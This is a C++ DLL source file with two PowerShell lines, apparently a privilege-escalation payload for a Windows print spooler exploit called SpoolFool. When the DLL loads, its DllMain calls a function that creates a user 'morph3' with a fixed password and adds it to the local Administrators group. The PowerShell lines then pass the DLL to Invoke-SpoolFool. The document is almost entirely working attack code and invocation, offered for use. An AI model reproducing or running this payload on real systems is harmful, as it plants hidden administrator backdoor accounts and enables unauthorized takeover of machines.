// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <stdlib.h>
  
void pwn() {
    system("net user morph3 Password123! /add");
    system("net localgroup Administrators morph3 /add");
}

  
BOOL APIENTRY DllMain( HMODULE hModule,
 DWORD ul_reason_for_call,
 LPVOID lpReserved
 )
{

 switch (ul_reason_for_call)
 {
	 case DLL_PROCESS_ATTACH:
		 pwn();
	 case DLL_THREAD_ATTACH:
	 case DLL_THREAD_DETACH:
	 case DLL_PROCESS_DETACH:
	 break;

 }

 return TRUE;

}

Import-Module .\SpoolFool.ps1
Invoke-SpoolFool -dll .\pwn.dll